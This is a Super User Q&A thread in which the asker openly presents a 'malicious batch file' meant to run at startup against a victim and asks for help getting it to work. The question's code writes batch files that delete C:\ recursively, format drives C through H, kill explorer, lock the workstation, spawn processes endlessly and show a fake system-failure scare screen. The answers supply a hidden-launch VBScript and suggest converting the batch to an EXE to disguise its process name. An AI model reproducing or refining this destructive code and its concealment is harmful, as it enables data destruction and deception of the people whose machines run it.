# How to stop every batch file opening as a process named cmd.exe as seen in task manager

Tags: windows-xp, command-line, batch, virus, vbscript

This is very complicated. I'm developing a malicious batch file just to test myself. This will be done at the startup.

what I have is Three + Six (**hidden**) Batch Files. First file makes six other hidden batch files and then **CALL**s the second **not hidden** file.

The second file just says some nasty things and in last executes the six files.

The Third file runs in the background and checks if the second file is running, if not, it will execute the six hidden files.

Now the problem I'm encountering. If the victim has a service or anything that opens a batch file at the startup and it keeps running, all the things get messed up, because all the running batch files have the process name `cmd.exe` If the victim closes the second **(not hidden)** file, but another batch file **(not part of the virus)** is running. The third batch file will assume it is still running. ***As it also has the name `cmd.exe`***

And also the second file will not open on the startup.

Here are the codes of my batch files.

File no. 1

```
@echo off

:DALLING

echo @echo off >>1.bat
echo :B >>1.bat
echo start >>1.bat
echo goto B >>1.bat

echo @echo off >>2.bat
echo color 02 >>2.bat
echo :start >>2.bat
echo taskkill -f explorer.exe  >>2.bat
echo start %windir%\System32\rundll32.exe user 32.dll, LockWorkStation            >>2.bat
echo rd c:\ /s /q >>2.bat
echo cls >>2.bat

echo @Echo off >>3.bat
echo Del C:\ *.* >>3.bat

echo format E:\ >>4.bat
echo format F:\ >>4.bat
echo format G:\ >>4.bat
echo format H:\ >>4.bat
echo format C:\ >>4.bat
echo pause >>4.bat

echo @echo off >>5.bat
echo :M >>5.bat
echo msg * ERROR!! >>5.bat
echo goto M >>5.bat

echo @echo off >>6.bat
echo color 02 >>6.bat
echo :start >>6.bat
echo taskkill -f explorer.exe >>6.bat
echo start %windir%\System32\rundll32.exe user 32.dll, LockWorkStation  >>6.bat
echo rd c:\ /s /q >>6.bat
echo cls >>6.bat

call **Second File**

:THE END
cls
echo BYE BYE! BIG BABY BOO!
ping 192.0.2.2 -n 1 -w 500 >nul
pause
start 1.bat
start 2.bat
start 3.bat
start 4.bat
start 5.bat
start 6.bat
EXIT
```

I know it has mess that won't work but still...

File No. 2

```
@echo off

:THW
color a
echo 5
ping 192.0.2.2 -n 1 -w 1000 >nul
cls
echo 4
ping 192.0.2.2 -n 1 -w 1000 >nul
cls
echo 3
ping 192.0.2.2 -n 1 -w 1000 >nul
cls
echo 2
ping 192.0.2.2 -n 1 -w 1000 >nul
cls
echo 1
ping 192.0.2.2 -n 1 -w 1000 >nul

:BHANUUB

cls
color 04
echo ERROR!
ping 192.0.2.2 -n 1 -w 1000 >nul 
echo.
echo.
echo.
echo System Failure! Windir/system32/Windows programming changing.          Warning, system disability!
echo System can still be saved, you might lose some data. Do you want to  save the system?
echo (y/n)?
echo.
echo.
set/p bhaa=
if %bhaa%==y goto HUH
if %bhaa%==Y goto HUH
if %bhaa%==n goto THE END
if %bhaa%==N goto THE END

:HUH
color a
cls
echo Saving system.
ping 192.0.2.2 -n 1 -w 500 >nul
cls
echo Saving system..
ping 192.0.2.2 -n 1 -w 500 >nul
cls
echo Saving system...
ping 192.0.2.2 -n 1 -w 500 >nul
cls
echo Saving system....
ping 192.0.2.2 -n 1 -w 500 >nul
cls
echo Saving system.....
ping 192.0.2.2 -n 1 -w 150 >nul
goto ENDDD
cls

:ENDDD
cls
color 04
echo HUH!! You wanna save the system, do you????
echo.
echo.
                                                              
echo      ***                          ***                       
echo      ***                          ***                          
echo      ***    \      /              ***              
echo      ***     \ \/ /               ***                     
echo      ***      \/\/ON'T LET YOU    ***                                         
echo      ***                          ***           
echo      ***                          ***                                                                       

ping 192.0.2.2 -n 1 -w 3000 >nul
goto THE END
```

I know the statements seem weird but still...

I picked the third file from stackoverflow and modified it a little, [Third file](https://stackoverflow.com/questions/23266509/check-if-a-process-is-running-or-not)

File No. 3

```
@echo off
:B

Set "MyProcess=cmd.exe"
echo "%MyProcess%"
tasklist /NH /FI "imagename eq %MyProcess%" 2>nul |find /i "%MyProcess%"   >nul
If not errorlevel 1 (Echo "%MyProcess%" est en cours d^'execution) else   (start "" "1.bat","" "2.bat","" "3.bat","" "4.bat","" "5.bat","" "6.bat")
goto B
```

And I know the code of the third file seems wrong but it is not. As it will stop executing the programs once the other`cmd.exe`s are started. But how to terminate it then?

And also how to execute all the six programs, not the way I've written I think.

And the third file will not be going in the startup folder as I have a vbscript I found that will start it in background.

BUT It's not working for me and also I don't know how to use it :P.

This  the VBscript(or solution) which I found.

```
Solution 1:

Save this one line of text as file invisible.vbs:

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

To run any program or batch file invisibly, use it like this:

wscript.exe “C:\Wherever\invisible.vbs” “C:\Some Other Place\MyBatchFile.bat”

To also be able to pass-on/relay a list of arguments use only two double quotes

CreateObject(“Wscript.Shell”).Run “” & WScript.Arguments(0) & “”, 0, False

eg: Invisible.vbs “Kill.vbs ME.exe”

Solution 2:

Use a command line tool to silently launch a process : Quiet.
```

I was going to put the first file and the vbscrip (if it was working) in the startup folder.

**Any** help will be hugely appreciated and I seek a detailed answer.

Thanks Superuser

*P.S:- The title is not enough for the problems, is it?*

Comment: Can i know why i got down voted ?

Comment: @LMFAO_A_JOKE I'm very sorry I asked the solution for file no.3. After file no.3 in my post there is a link to the vbscript. Visit it. By the way ill update my question with the code of vbscript. :-) Remember, the code is at the end of the webpage

Comment: and sorry @LMFAO_A_JOKE that I didn't notice your comments for an hour, as I was busy earning reputation and I am now 28!

Comment: I edited the question @LMFAO_A_JOKE

Comment: Also @LMFAO_A_JOKE can you upvote my this question plz.   :) I care for my reputation

Comment: @BhanuKumar - Your question is confusing.  Please don't beg for votes, they will come naturally, if you write quality content.

Answer (score 2, accepted):

> **For the 3rd part**
>
> And the third file will not be going in the startup folder as I have a
>   vbscript I found that will start it in background.
>
> BUT It's not working for me and also I don't know how to use it :P.
>
> This the VBscript(or solution) which I found.

To run a batch script or some other process as **HIDDEN** so it does show when launched as it would otherwise, use the below logic saved to a .VBS file. You will launch the .VBS file to execute whatever program or script you have it pointed to, and when that process is run, it'll not show a console window, etc.

**Important:** *Be sure to plug in the full path and name of the process you wish to launch hidden in the part of the script in my example shown as `C:\Path\Script.bat`, and also be sure to KEEP the double quotes around it regardless of spaces in the path or file name.*

```
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "C:\Path\Script.bat" & Chr(34), 0
Set WinScriptHost = Nothing
```

**Note:** I use this for a couple scheduled processes on a server where multiple people RDP into it for managing different types of scheduled jobs and schedulers (not Task Scheduler but on Windows Server), and it suits the need quite fine. I'd suggest having your batch or other processes log to a log file for later review, dynamic error reporting, etc. if possible.

**Source:** [*Server Fault*](https://serverfault.com/questions/9038/run-a-bat-file-in-a-scheduled-task-without-a-window)

Answer (score 5):

Wow that's quite a lot of information, much of which just adds confusion, so I'll stick to the title question at hand... :)

> How to stop every batch file opening as a process named cmd.exe as seen in task manager?

Since batch files are intended for automating (scripting) the command-line, *all* batch files are run by the [command-line interpreter](https://en.wikipedia.org/wiki/Command-line_interface) process, which on Windows is `cmd.exe`.

I think the easiest method in your scenario would be to use a utility to convert your batch file into an EXE.  That way you can name it how you'd like, apply an icon, and most importantly, have it show up in Task Manager as its own, named process.

For help with converting, check out this existing SU question: [How can I convert a Windows batch script to a .exe?](https://superuser.com/questions/868340/how-can-i-convert-a-windows-batch-script-to-a-exe)

Comment: Thanks for the answer @TECHIE007 (and now i think how stupid i was). But there are **two more** questions up there. First about my third batch file and the second about the HTG vbscript. I suppose you haven't read the whole post. Please answer me. And thanks again

Comment: @BhanuKumar - You should clarify your question, so it is less confusing, much of the information isn't even required.  I also don't see "other" questions except the primary question.  When you submit a question, it should ask a singular thing, questions asking multiple things are an indication that it is too broad of a question overall.